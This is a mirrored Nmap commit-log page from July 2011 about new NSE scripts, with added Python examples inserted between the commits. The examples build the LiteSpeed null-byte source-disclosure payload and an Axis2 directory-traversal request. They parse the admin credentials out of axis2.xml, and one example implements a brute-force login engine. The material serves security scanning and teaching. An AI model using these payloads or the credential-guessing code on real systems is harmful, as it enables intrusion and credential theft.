mirror of https://github.com/nmap/nmap.git synced 2025-12-20 22:49:01 +00:00
Commit Graph

5872 Commits

Author SHA1 Message Date
paulino
d4054187e4 Adds http-axis2-dir-traversal:
http-axis2-dir-traversal exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter <code>xsd</code> (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service <code>'/conf/axis2.xml'</code> using the path <code>'/axis2/services/'</code> to return the username and password of the admin account.
2011-07-24 21:10:04 +00:00
paulino
c43e0bb970 Added http-litespeed-sourcecode-download:
http-litespeed-sourcecode-download.nse exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending an HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).

If the server is not vulnerable it returns an error 400. If index.php is not found, you may try /phpinfo.php which is also shipped with LiteSpeed Web Server. The attack payload looks like this:
* <code>/index.php\00.txt</code>

References:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2333
* http://www.exploit-db.com/exploits/13850/
2011-07-24 20:13:42 +00:00
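The two entries above (http-axis2-dir-traversal and http-litespeed-sourcecode-download) and the later "string.format for regular string concatenation to allow null bytes" fix all come down to building a request byte for byte and reading the answer. The following is an added example, not code from Nmap or from either NSE script: it assembles the LiteSpeed null-byte request and the Axis2 traversal request by concatenation, classifies the server's reply (400 on a patched LiteSpeed, PHP source on a vulnerable one), and pulls the admin login out of a retrieved axis2.xml. The host name, the `?xsd=` query layout and every sample response are assumptions constructed here; nothing is sent on the wire.

```python
# Added example (not code from Nmap or the NSE scripts listed above). The
# hostname, the '?xsd=' query layout and all sample responses are constructed
# assumptions for illustration; nothing is sent to a real server.
import re


def build_request(path: bytes, host: bytes) -> bytes:
    """Assemble a raw HTTP/1.0 request by byte concatenation.

    Concatenation matters: a printf-style formatter that treats the path as a
    C string stops at the first NUL and silently drops the '\\x00.txt' suffix,
    which is the bug the string.format -> concatenation commit fixed.
    """
    if b"\r" in path or b"\n" in path:
        raise ValueError("CR/LF in path would split the request line")
    return (b"GET " + path + b" HTTP/1.0\r\n"
            + b"Host: " + host + b"\r\n"
            + b"Connection: close\r\n\r\n")


def litespeed_payload(script_path: bytes) -> bytes:
    """CVE-2010-2333 payload: '/index.php' becomes '/index.php\\x00.txt'."""
    return script_path + b"\x00.txt"


def axis2_traversal_path(services_path: bytes = b"/axis2/services/",
                         target: bytes = b"../conf/axis2.xml") -> bytes:
    """Traversal request via the xsd parameter (query layout is an assumption)."""
    return services_path + b"?xsd=" + target


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status_code, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    parts = status_line.split(b" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError("malformed status line: %r" % status_line)
    return int(parts[1]), body


def classify_litespeed(raw: bytes) -> str:
    """A patched LiteSpeed answers 400; a vulnerable one serves the PHP source."""
    status, body = parse_response(raw)
    if status == 400:
        return "not vulnerable"
    if status == 200 and b"<?php" in body:
        return "vulnerable: source disclosed"
    return "inconclusive"


# axis2.xml keeps the admin login in userName/password <parameter> elements
AXIS2_PARAM = re.compile(rb'<parameter\s+name="(userName|password)"\s*>([^<]*)</parameter>')


def extract_axis2_credentials(axis2_xml: bytes) -> dict:
    """Return {'userName': ..., 'password': ...} from a retrieved axis2.xml."""
    return {k.decode(): v.decode() for k, v in AXIS2_PARAM.findall(axis2_xml)}


# Constructed sample responses (not captured from a real server)
SAMPLE_LITESPEED_VULN = (b"HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n"
                         b"<?php\nphpinfo();\n")
SAMPLE_LITESPEED_PATCHED = b"HTTP/1.0 400 Bad Request\r\n\r\n"
SAMPLE_AXIS2_XML = (b"<axisconfig>\n"
                    b'  <parameter name="userName">admin</parameter>\n'
                    b'  <parameter name="password">axis2</parameter>\n'
                    b"</axisconfig>\n")

if __name__ == "__main__":
    print(build_request(litespeed_payload(b"/index.php"), b"target.example"))
    print(classify_litespeed(SAMPLE_LITESPEED_VULN))
    print(extract_axis2_credentials(SAMPLE_AXIS2_XML))
```

Check the request bytes on the wire (or in a pcap) before trusting a "not vulnerable" verdict: if the NUL was dropped anywhere in the send path, the server saw a plain `/index.php` and a 200 with rendered output says nothing about the bug.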
shinnok
e2fcc14fe2 Update my TODO file. 2011-07-22 21:55:18 +00:00
shinnok
a83e27c0fb Update CHANGELOG with the Ncat blocking ssl handshakes fix. 2011-07-22 21:43:24 +00:00
djalal
bd6d08232d Added the '--script-help' option to the Nmap usage. 2011-07-22 10:59:07 +00:00
batrick
4d27d83f62 Fix to make SCRIPT_NAME not have a filename extension in certain situations.
See [1].

[1] http://seclists.org/nmap-dev/2011/q3/304
2011-07-21 18:26:11 +00:00
batrick
9d7ce06a96 better error message when script fails to load (now includes traceback of the script) 2011-07-21 17:46:16 +00:00
patrik
cbf959aecc o [NSE] Added the script broadcast-dhcp-discover that sends a DHCP discover
  message to the broadcast address and collects and reports the network
  information received from the DHCP server. [Patrik]
2011-07-21 11:56:15 +00:00
patrik
29c973befa Add imap-brute as I missed it in the earlier commit [Patrik] 2011-07-21 10:04:30 +00:00
patrik
ee7e069e63 o [NSE] Added the script smtp-brute that performs brute force password
  auditing against SMTP servers. [Patrik]

o [NSE] Updated SMTP library to support authentication using both plain-text
  and the SASL library. [Patrik]
2011-07-21 06:16:20 +00:00
patrik
0453f89779 o [NSE] Added the script imap-brute that performs brute force password
  auditing against IMAP servers. [Patrik]

o [NSE] Updated IMAP library to support authentication using both plain-text
  and the SASL library. [Patrik]
2011-07-21 06:14:02 +00:00
patrik
222e8b9e42 o [NSE] Added SASL library created by Djalal Harouni and Patrik Karlsson
  providing common code for "Simple Authentication and Security Layer" to
  services supporting it. The algorithms supported by the library are:
  PLAIN, CRAM-MD5, DIGEST-MD5 and NTLM. [Patrik Karlsson, Djalal Harouni]
2011-07-21 06:07:02 +00:00
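The SASL library entry above and the smtp-brute / imap-brute entries before it describe the same mechanism from two sides: a SASL mechanism produces the client response, and the brute scripts drive it over the protocol's AUTH exchange. The following is an added example, not the NSE sasl library or either brute script: it implements the client side of PLAIN and CRAM-MD5 (the two mechanisms a brute-force script can complete without a server-side crypto context), a constant-time server-side verifier for CRAM-MD5, and the SMTP `AUTH CRAM-MD5` turn where the client converts the server's `334` challenge line into its reply. The user name, password and challenge are the RFC 2195 example values; the `334` line is constructed.

```python
# Added example (not the NSE sasl library or smtp/imap-brute). User, password
# and challenge are the RFC 2195 example values; the 334 line is constructed.
import base64
import hashlib
import hmac
from typing import Optional


def sasl_plain(user: str, password: str, authzid: str = "") -> bytes:
    """RFC 4616 PLAIN: base64(authzid NUL authcid NUL passwd)."""
    for field in (authzid, user, password):
        if "\x00" in field:
            raise ValueError("NUL is the field separator and cannot appear in a field")
    return base64.b64encode(f"{authzid}\x00{user}\x00{password}".encode("utf-8"))


def cram_md5_digest(password: str, challenge: bytes) -> str:
    """RFC 2195 keyed digest: hex(HMAC-MD5(key=password, msg=challenge))."""
    return hmac.new(password.encode("utf-8"), challenge, hashlib.md5).hexdigest()


def sasl_cram_md5(user: str, password: str, challenge: bytes) -> bytes:
    """Client response: base64('user ' + digest); the password never leaves the client."""
    return base64.b64encode(f"{user} {cram_md5_digest(password, challenge)}".encode("utf-8"))


def verify_cram_md5(stored_password: str, challenge: bytes, response_b64: bytes) -> Optional[str]:
    """Server side: return the user name if the digest matches, else None.

    The comparison is constant time; a plain == would leak timing. Note the
    server must hold the plaintext password (or an MD5 context of it).
    """
    try:
        decoded = base64.b64decode(response_b64, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, _, digest = decoded.partition(" ")
    expected = cram_md5_digest(stored_password, challenge)
    return user if hmac.compare_digest(digest, expected) else None


def smtp_auth_cram_md5(user: str, password: str, server_334_line: bytes) -> bytes:
    """Turn the server's '334 <base64 challenge>' into the client's reply line.

    Exchange: C: AUTH CRAM-MD5 / S: 334 <b64 challenge> / C: <b64 response> /
    S: 235 on success, 535 on failure.
    """
    code, _, b64 = server_334_line.strip().partition(b" ")
    if code != b"334":
        raise ValueError("expected a 334 continuation, got %r" % server_334_line)
    return sasl_cram_md5(user, password, base64.b64decode(b64)) + b"\r\n"


RFC2195_CHALLENGE = b"<1896.697170952@postoffice.reston.mci.net>"
# Constructed server line carrying that challenge
SERVER_334 = b"334 " + base64.b64encode(RFC2195_CHALLENGE) + b"\r\n"

if __name__ == "__main__":
    print(sasl_plain("tim", "tanstaaftanstaaf"))
    reply = smtp_auth_cram_md5("tim", "tanstaaftanstaaf", SERVER_334)
    print(reply, verify_cram_md5("tanstaaftanstaaf", RFC2195_CHALLENGE, reply.strip()))
```

For password auditing the practical difference is that PLAIN ships the password in the clear (base64 is not encryption, so only use it under TLS), while CRAM-MD5 sends a challenge-bound digest; a server that offers only CRAM-MD5 must store passwords recoverably, which is its own finding.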
patrik
c3f94727ad o [NSE] Added scripts cvs-brute.nse, cvs-brute-repository.nse and the cvs
  library. The cvs-brute-repository script allows for guessing possible
  repository names needed in order to perform password guessing using the
  cvs-brute.nse script. [Patrik]
2011-07-21 06:01:19 +00:00
patrik
2faca7aed1 Added support for scripts to report invalid (non-existing) accounts back
to the brute library. This way, they're removed from further guessing.
[Patrik]
2011-07-21 05:56:58 +00:00
fyodor
4c03e43d2f Fix a typo in category name 2011-07-21 05:12:33 +00:00
weilin
586b8464b2 Reverted the unintended changes on nselib/packet.lua@25009. 2011-07-21 02:32:47 +00:00
colin
fd59f6f8d2 Updated changelog with zenmap crash reporter changes 2011-07-20 19:18:53 +00:00
weilin
e889dead91 o Added IPv6 Neighbor Discovery ping. This is the IPv6 analog to IPv4
  ARP scan. It is the default ping type for local IPv6 networks.
2011-07-20 08:29:02 +00:00
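The entry above describes ND ping as the IPv6 counterpart of ARP scan; what differs from ARP is the addressing. The following is an added example, not Nmap's ND ping implementation: it derives the solicited-node multicast group and its Ethernet MAC from a target address, builds the ICMPv6 Neighbor Solicitation with a Source Link-Layer Address option, computes the pseudo-header checksum, and matches the Neighbor Advertisement that a live host sends back. The addresses and the source MAC are constructed for illustration; nothing is put on the wire.

```python
# Added example (not Nmap's ND ping code). Addresses and the source MAC are
# constructed for illustration; nothing is sent on the wire.
import ipaddress
import struct

SOLICITED_NODE_PREFIX = int(ipaddress.IPv6Address("ff02::1:ff00:0"))


def solicited_node_multicast(target: str) -> str:
    """RFC 4291: ff02::1:ffXX:XXXX, where XX:XXXX is the low 24 bits of the target.

    This is why ND ping needs no broadcast: only hosts whose address shares
    those 24 bits join the group, so the probe wakes far fewer stacks than
    an ARP broadcast would.
    """
    low24 = int(ipaddress.IPv6Address(target)) & 0xFFFFFF
    return str(ipaddress.IPv6Address(SOLICITED_NODE_PREFIX | low24))


def ipv6_multicast_mac(addr: str) -> bytes:
    """RFC 2464: 33:33 followed by the low 32 bits of the multicast address."""
    return b"\x33\x33" + ipaddress.IPv6Address(addr).packed[-4:]


def icmpv6_checksum(src: str, dst: str, payload: bytes) -> int:
    """Internet checksum over the IPv6 pseudo-header (next header 58) + payload."""
    pseudo = (ipaddress.IPv6Address(src).packed
              + ipaddress.IPv6Address(dst).packed
              + struct.pack("!I", len(payload))
              + b"\x00\x00\x00\x3a")
    data = pseudo + payload
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def neighbor_solicitation(src_ip: str, src_mac: bytes, target_ip: str):
    """Return (dst_ip, dst_mac, icmpv6_bytes) for an NS probing target_ip.

    Layout: type 135, code 0, checksum, 4 reserved bytes, 16-byte target,
    then option type 1 (Source Link-Layer Address), length 1 (8 bytes).
    """
    if len(src_mac) != 6:
        raise ValueError("src_mac must be 6 bytes")
    dst_ip = solicited_node_multicast(target_ip)
    target = ipaddress.IPv6Address(target_ip).packed
    body = struct.pack("!BBHI", 135, 0, 0, 0) + target + b"\x01\x01" + src_mac
    csum = icmpv6_checksum(src_ip, dst_ip, body)
    body = body[:2] + struct.pack("!H", csum) + body[4:]
    return dst_ip, ipv6_multicast_mac(dst_ip), body


def is_neighbor_advertisement_for(pkt: bytes, target_ip: str) -> bool:
    """Match a reply: ICMPv6 type 136 whose target field echoes our probe."""
    return (len(pkt) >= 24 and pkt[0] == 136
            and pkt[8:24] == ipaddress.IPv6Address(target_ip).packed)


if __name__ == "__main__":
    dst, mac, ns = neighbor_solicitation("fe80::1", bytes.fromhex("001122334455"),
                                         "fe80::abcd:1234:5678")
    print(dst, mac.hex(":"), ns.hex())
```

Because the destination is a link-scope multicast group, the probe only works on the local segment, which is why the entry above makes it the default for local IPv6 networks and not for remote ones.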
david
c32d196ce2 Remove the nonexistent include/config.h from the build configuration.
With this present, the project always appeared out of date. Visual C++
would always prompt to rebuild the project when starting to debug, for
example.
2011-07-20 07:16:05 +00:00
david
6cf428d8c6 Fix some "and" -> "&&". 2011-07-19 23:42:33 +00:00
david
1646813162 Whitespace and formatting in osscan.cc. 2011-07-19 22:00:13 +00:00
david
9a64d66a1e Clarify an ambiguous if/else. 2011-07-19 21:40:32 +00:00
david
75cd409ba5 Fix some [-Wunused-but-set-variable] warnings. 2011-07-19 21:40:32 +00:00
fyodor
532eab87e7 Add a small bug/misfeature task 2011-07-19 18:55:03 +00:00
weilin
1dcf652410 Added ND ping for local IPv6 nets, merging from /nmap-exp/weilin/nmap-nd. 2011-07-19 02:31:54 +00:00
fyodor
737035118a Note some done stuff 2011-07-19 02:06:39 +00:00
david
e2bb7cc271 Fix an indexing bug in http-vhosts.nse. Found by Daniel Miller. 2011-07-18 20:44:22 +00:00
david
bbf254d90e Fix incorrect (broken) return value in p2p-conficker.nse. Spotted by
Daniel Miller.
2011-07-18 20:40:47 +00:00
david
f57b87a010 Capitalization in service probe. 2011-07-18 16:29:40 +00:00
david
6d371adee8 Formatting. 2011-07-18 16:29:38 +00:00
david
a2314b2041 Add port 9050, tor-socks, to the portrule for socks-open-proxy.nse. 2011-07-18 16:29:37 +00:00
djalal
01f4cdd83e o [NSE] Small improvements on the smtp-vuln-cve2011-1764 script:
  - Check the port.version.product in the portrule to see if it matches
    the 'Exim smtpd'
  - If the script was not able to confirm the vulnerability but the Exim
    version is between 4.70 and 4.75, then report: "LIKELY VULNERABLE".
2011-07-18 11:42:41 +00:00
djalal
2c7cad079b o [NSE] Added smtp-vuln-cve2011-1764 script, which checks the Exim DKIM
Format String vulnerability (CVE-2011-1764).
2011-07-18 10:21:01 +00:00
djalal
cc062e2e1e o [NSE] Remove the mac-geolocation script entries since it was deleted.
  - Update the script.db file.
  - Add the script name to the 'OLD_SCRIPT_NAMES' variable in the Makefile.in file.
2011-07-18 09:58:50 +00:00
djalal
30bd1681b0 o [NSE] Made the following scripts in the default category:
  giop-info.nse
  vnc-info.nse
  ncp-serverinfo.nse
  afp-serverinfo.nse
2011-07-18 09:50:18 +00:00
gorjan
1f9479a161 Removing the mac-geolocation script which used the no longer available Google Geolocation API service 2011-07-17 17:26:59 +00:00
gorjan
d780448af7 Updating the script to use an API key supplied by the user through the script-args. 2011-07-17 17:22:58 +00:00
paulino
8215c3420f Fixes the way of creating the request line by changing string.format for regular string concatenation to allow null bytes in the requests. 2011-07-15 23:48:00 +00:00
paulino
deded46038 Adds apache axis2 login signature. 2011-07-15 23:43:10 +00:00
paulino
6a8a10794f Adds more paths for Coldfusion and Apache Axis2 2011-07-15 23:33:03 +00:00
djalal
ce11504eff Updated my TODO file. 2011-07-15 16:46:12 +00:00
patrik
4356fe16a5 * fixed a bug that would result in unnecessary connects and disconnect for
discovered accounts

* documented engine options

* added new engine option (nostore) that instructs the library not to store
  the discovered credentials in the credential database
2011-07-13 20:49:20 +00:00
patrik
c800c437a9 added check for unknown account state to avoid crash when retrieving accounts. 2011-07-13 20:46:15 +00:00
shinnok
e91c17f7a9 Add a new task in my TODO file and note a completed one. 2011-07-13 17:55:24 +00:00
gorjan
9b7d310355 Adding the broadcast-ping script. 2011-07-13 09:38:40 +00:00
gorjan
70b09c9598 Small fix: missed an 'end' 2011-07-13 09:34:19 +00:00
gorjan
c08ca750fa Added default values for the index and length parameters if no value is supplied in the Packet:raw(index,length) function of the nselib/packet.lua library 2011-07-13 09:27:54 +00:00
gorjan
5f3b402cf7 Putting back the old snmp-brute until I'm finished writing the new one 2011-07-12 23:25:57 +00:00
patrik
aadac7c8d5 * Fixed a bug in the brute library that prevented additional passwords from
  being found if run in passonly mode.

* Fixed a bug in the brute library preventing detection of duplicate
  credential entries requested from the iterator.
2011-07-12 21:23:12 +00:00
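Several brute-library entries on this page describe engine behaviour rather than any one protocol: scripts can report a non-existing account so it is dropped from further guessing (2faca7aed1), the engine must not crash on an unknown account state (c800c437a9), a `nostore` option keeps hits out of the credential database (4356fe16a5), and passonly mode must keep going after a hit while duplicate credentials from the iterator are tried only once (aadac7c8d5). The following is an added example, not the NSE brute library: a minimal engine that implements those rules against two constructed fake services, one taking user/password pairs and one taking a password alone.

```python
# Added example (not the NSE brute library). The fake services, account table
# and word lists are constructed for illustration.
from enum import Enum
from typing import Callable, Iterator, List, Optional, Set, Tuple

Cred = Tuple[Optional[str], str]


class State(Enum):
    VALID = "valid"                          # credentials accepted
    INVALID_CREDENTIALS = "invalid_credentials"
    INVALID_ACCOUNT = "invalid_account"      # account does not exist: stop guessing it


class BruteEngine:
    def __init__(self, login: Callable[[Optional[str], str], State],
                 users: List[str], passwords: List[str],
                 passonly: bool = False, nostore: bool = False):
        self.login = login
        self.users = users
        self.passwords = passwords
        self.passonly = passonly
        self.nostore = nostore
        self.credential_store: List[Cred] = []   # stands in for the creds database
        self.attempts = 0

    def _iterator(self) -> Iterator[Cred]:
        """Yield candidates; may yield duplicates, as a word list often does."""
        if self.passonly:
            for p in self.passwords:
                yield None, p
        else:
            for u in self.users:
                for p in self.passwords:
                    yield u, p

    def run(self) -> List[Cred]:
        found: List[Cred] = []
        tried: Set[Cred] = set()
        dead_accounts: Set[str] = set()   # reported as non-existing by the service
        done_users: Set[str] = set()      # user/pass mode: first hit per user is enough
        for user, password in self._iterator():
            if user in dead_accounts or user in done_users:
                continue
            if (user, password) in tried:
                continue                  # duplicate from the iterator, tried once only
            tried.add((user, password))
            self.attempts += 1
            state = self.login(user, password)
            if not isinstance(state, State):
                # unknown state: fail loudly instead of indexing a missing entry
                raise RuntimeError("login returned unknown account state %r" % (state,))
            if state is State.INVALID_ACCOUNT:
                dead_accounts.add(user)
            elif state is State.VALID:
                found.append((user, password))
                if not self.passonly:
                    done_users.add(user)
                if not self.nostore:
                    self.credential_store.append((user, password))
        return found


# Constructed fake services standing in for SMTP/IMAP/CVS style logins.
ACCOUNTS = {"admin": "axis2", "bob": "hunter2"}


def userpass_service(user: Optional[str], password: str) -> State:
    if user not in ACCOUNTS:
        return State.INVALID_ACCOUNT
    return State.VALID if ACCOUNTS[user] == password else State.INVALID_CREDENTIALS


VNC_STYLE_PASSWORDS = {"secret", "letmein"}


def passonly_service(_user: Optional[str], password: str) -> State:
    return State.VALID if password in VNC_STYLE_PASSWORDS else State.INVALID_CREDENTIALS


if __name__ == "__main__":
    eng = BruteEngine(userpass_service, ["admin", "nobody", "bob"],
                      ["x", "axis2", "axis2", "hunter2"])
    print(eng.run(), "attempts:", eng.attempts)
    print(BruteEngine(passonly_service, [], ["a", "secret", "letmein"], passonly=True).run())
```

The `INVALID_ACCOUNT` prune is only as good as the service's willingness to distinguish "no such user" from "wrong password"; a hardened server returns the same answer for both, in which case the engine correctly keeps guessing and the pruning simply never triggers.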
patrik
23d2e0d31f o [NSE] Applied patch from Chris Woodbury that adds the following additional
  information to the output of smb-os-discovery:
  + Forest name
  + FQDN
  + NetBIOS computer name
  + NetBIOS domain name
2011-07-12 06:08:43 +00:00